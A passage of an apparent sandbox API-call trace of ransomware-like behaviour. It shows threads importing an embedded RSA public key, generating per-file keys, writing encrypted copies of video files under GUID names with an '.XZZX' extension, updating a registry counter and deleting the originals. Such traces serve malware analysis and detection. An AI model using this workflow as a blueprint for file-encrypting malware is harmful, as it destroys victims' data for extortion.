KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.415] OutputDebugStringW (lpOutputString="end") [0133.415] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ$\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x424dbf4, pcbBinary=0x424d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.415] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x424dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8 | out: pvStructInfo=0x424d3dc, pcbStructInfo=0x424d3d8) returned 1 [0133.415] CryptAcquireContextW (in: phProv=0x424d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x424d3e4*=0x3cf8478) returned 1 [0133.416] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8478, dwCertEncodingType=0x1, pInfo=0x3cf19f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1a20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1a28*, PublicKey.cUnusedBits=0x0), phKey=0x424d3ec | out: phKey=0x424d3ec*=0x3d11318) returned 1 [0133.416] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.417] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.417] CryptEncrypt (in: hKey=0x3d11318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x424d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x424d3f0*=0x80) returned 1 [0133.417] CryptEncrypt (in: hKey=0x3d11318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8500*, pdwDataLen=0x424d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8500*, pdwDataLen=0x424d3e8*=0x80) returned 1 [0133.417] WriteFile (in: hFile=0x6f4, lpBuffer=0x3cf8500*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8500*, lpNumberOfBytesWritten=0x424e438*=0x80, lpOverlapped=0x0) returned 1 [0133.417] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.418] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.418] GetUserNameW (in: lpBuffer=0x424e1f8, pcbBuffer=0x424dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x424dfe0) returned 1 [0133.418] wsprintfW (in: param_1=0x424dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.418] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe4 | out: phkResult=0x424dfe4*=0x6f8) returned 0x0 [0133.418] RegQueryValueExW (in: hKey=0x6f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x424dfd8, lpData=0x424dfec, lpcbData=0x424dfdc*=0x4 | out: lpType=0x424dfd8*=0x4, lpData=0x424dfec*=0xbf, lpcbData=0x424dfdc*=0x4) returned 0x0 [0133.418] RegCloseKey (hKey=0x6f8) returned 0x0 [0133.418] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x424dfe8 | out: phkResult=0x424dfe8*=0x6f8) returned 0x0 [0133.418] RegSetValueExW (in: hKey=0x6f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x424dfec*=0xc0, cbData=0x4 | out: lpData=0x424dfec*=0xc0) returned 0x0 [0133.419] RegCloseKey (hKey=0x6f8) returned 0x0 [0133.419] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.419] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.419] CloseHandle (hObject=0x6f4) returned 1 [0133.421] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.421] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.421] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\xTAGaGiIpU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\xtagagiipu.mp4")) returned 1 [0133.422] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\xTAGaGiIpU.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\xtagagiipu.mp4")) returned 0 Thread: id = 456 os_tid = 0xa70 [0133.401] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.401] lstrcpyW (in: lpString1=0x434f460, lpString2="AmR.swf" | out: lpString1="AmR.swf") returned="AmR.swf" [0133.401] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.401] SetErrorMode (uMode=0x1) returned 0x1 [0133.401] lstrcpyW (in: lpString1=0x434f860, lpString2="AmR.swf" | out: lpString1="AmR.swf") returned="AmR.swf" [0133.401] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x3c1202c8, Data2=0xf9e4, Data3=0x4371, Data4=([0]=0x8f, [1]=0x1, [2]=0xf1, [3]=0x4e, [4]=0xd, [5]=0x16, [6]=0xe6, [7]=0x17))) returned 0x0 [0133.401] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\AmR.swf") returned 66 [0133.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.401] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\04BF022041D4F9A43C1202C84609DDEC.XZZX") returned 96 [0133.401] StrStrW (lpFirst="AmR.swf", lpSrch="XZZX") returned 0x0 [0133.401] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\AmR.swf", dwFileAttributes=0x20) returned 1 [0133.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\AmR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\amr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0133.424] ReadFile (in: hFile=0x6e4, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0x10572, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x434e418*=0x10572, lpOverlapped=0x0) returned 1 [0133.425] CloseHandle (hObject=0x6e4) returned 1 [0133.425] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0133.425] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0133.426] SetErrorMode (uMode=0x1) returned 0x1 [0133.426] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.426] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8588) returned 1 [0133.429] CryptGenKey (in: hProv=0x3cf8588, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11458) returned 1 [0133.621] CryptExportKey (in: hKey=0x3d11458, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0133.621] CryptExportKey (in: hKey=0x3d11458, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0133.621] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.621] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.621] CryptDestroyKey (hKey=0x3d11458) returned 1 [0133.621] CryptReleaseContext (hProv=0x3cf8610, dwFlags=0x0) returned 0 [0133.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\04BF022041D4F9A43C1202C84609DDEC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\04bf022041d4f9a43c1202c84609ddec.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f8 [0133.622] WriteFile (in: hFile=0x6f8, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0x10572, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x434e438*=0x10572, lpOverlapped=0x0) returned 1 [0133.623] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10572 [0133.623] WriteFile (in: hFile=0x6f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0133.623] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10577 [0133.623] WriteFile (in: hFile=0x6f8, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0xe, lpOverlapped=0x0) returned 1 [0133.623] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10585 [0133.623] WriteFile (in: hFile=0x6f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0133.623] SetFilePointer (in: hFile=0x6f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1058a [0133.623] SetErrorMode (uMode=0x1) returned 0x1 [0133.623] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0133.623] OutputDebugStringW (lpOutputString="end") [0133.623] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0133.623] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0133.624] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf8698) returned 1 [0133.624] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8698, dwCertEncodingType=0x1, pInfo=0x3cf1e00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1e30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1e38*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11458) returned 1 [0133.624] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.625] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0133.625] CryptEncrypt (in: hKey=0x3d11458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0133.625] CryptEncrypt (in: hKey=0x3d11458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8720*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8720*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0133.625] WriteFile (in: hFile=0x6f8, lpBuffer=0x3cf8720*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8720*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0133.625] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0133.625] WriteFile (in: hFile=0x6f8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0133.625] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0133.625] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0133.625] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x704) returned 0x0 [0133.625] RegQueryValueExW (in: hKey=0x704, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xc0, lpcbData=0x434dfdc*=0x4) returned 0x0 [0133.626] RegCloseKey (hKey=0x704) returned 0x0 [0133.626] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x704) returned 0x0 [0133.626] RegSetValueExW (in: hKey=0x704, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xc1, cbData=0x4 | out: lpData=0x434dfec*=0xc1) returned 0x0 [0133.626] RegCloseKey (hKey=0x704) returned 0x0 [0133.626] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.626] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.626] CloseHandle (hObject=0x6f8) returned 1 [0133.627] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0133.628] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0133.628] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\AmR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\amr.swf")) returned 1 [0133.629] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\AmR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\amr.swf")) returned 0 Thread: id = 457 os_tid = 0xa74 [0133.557] lstrcpyA (in: lpString1=0x424fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.557] lstrcpyW (in: lpString1=0x424f460, lpString2="fJw1HV.flv" | out: lpString1="fJw1HV.flv") returned="fJw1HV.flv" [0133.557] lstrcpyW (in: lpString1=0x424e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\" [0133.557] SetErrorMode (uMode=0x1) returned 0x1 [0133.557] lstrcpyW (in: lpString1=0x424f860, lpString2="fJw1HV.flv" | out: lpString1="fJw1HV.flv") returned="fJw1HV.flv" [0133.557] CoCreateGuid (in: pguid=0x424e440 | out: pguid=0x424e440*(Data1=0x110664b5, Data2=0xc530, Data3=0x4b6b, Data4=([0]=0xb5, [1]=0x22, [2]=0xda, [3]=0x14, [4]=0x9c, [5]=0xe5, [6]=0xbc, [7]=0x10))) returned 0x0 [0133.557] wsprintfW (in: param_1=0x424ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\fJw1HV.flv") returned 69 [0133.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x424fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0133.557] wsprintfW (in: param_1=0x424e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\1CB22AF03A177B10110664B53E3C5F58.XZZX") returned 96 [0133.557] StrStrW (lpFirst="fJw1HV.flv", lpSrch="XZZX") returned 0x0 [0133.557] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\fJw1HV.flv", dwFileAttributes=0x20) returned 1 [0133.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\fJw1HV.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\fjw1hv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f8 [0133.558] ReadFile (in: hFile=0x6f8, lpBuffer=0x4389278, nNumberOfBytesToRead=0x15b38, lpNumberOfBytesRead=0x424e418, lpOverlapped=0x0 | out: lpBuffer=0x4389278*, lpNumberOfBytesRead=0x424e418*=0x15b38, lpOverlapped=0x0) returned 1 [0133.559] CloseHandle (hObject=0x6f8) returned 1 [0133.559] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0133.560] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0133.560] SetErrorMode (uMode=0x1) returned 0x1 [0133.560] lstrcpyW (in: lpString1=0x424e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0133.560] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8610) returned 1 [0133.563] CryptGenKey (in: hProv=0x3cf8610, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11498) returned 1 [0133.700] CryptExportKey (in: hKey=0x3d11498, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x424e41c | out: pbData=0x0*, pdwDataLen=0x424e41c*=0x94) returned 1 [0133.700] CryptExportKey (in: hKey=0x3d11498, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x424e41c | out: pbData=0x4350000*, pdwDataLen=0x424e41c*=0x94) returned 1 [0133.700] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0133.701] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0133.701] CryptDestroyKey (hKey=0x3d11498) returned 1 [0133.701] CryptReleaseContext (hProv=0x3cf8610, dwFlags=0x0) returned 0 [0133.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\wpc5n64XVm\\1CB22AF03A177B10110664B53E3C5F58.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\wpc5n64xvm\\1cb22af03a177b10110664b53e3c5f58.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f4 [0133.702] WriteFile (in: hFile=0x6f4, lpBuffer=0x4389278*, nNumberOfBytesToWrite=0x15b38, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x4389278*, lpNumberOfBytesWritten=0x424e438*=0x15b38, lpOverlapped=0x0) returned 1 [0133.703] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15b38 [0133.703] WriteFile (in: hFile=0x6f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x424e438*=0x5, lpOverlapped=0x0) returned 1 [0133.703] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15b3d [0133.703] WriteFile (in: hFile=0x6f4, lpBuffer=0x424f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x424e438, lpOverlapped=0x0 | out: lpBuffer=0x424f860*, lpNumberOfBytesWritten=0x424e438*=0x14, lpOverlapped=0x0) returned 1 [0133.703] SetFilePointer (in: hFile=0x6f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15b51 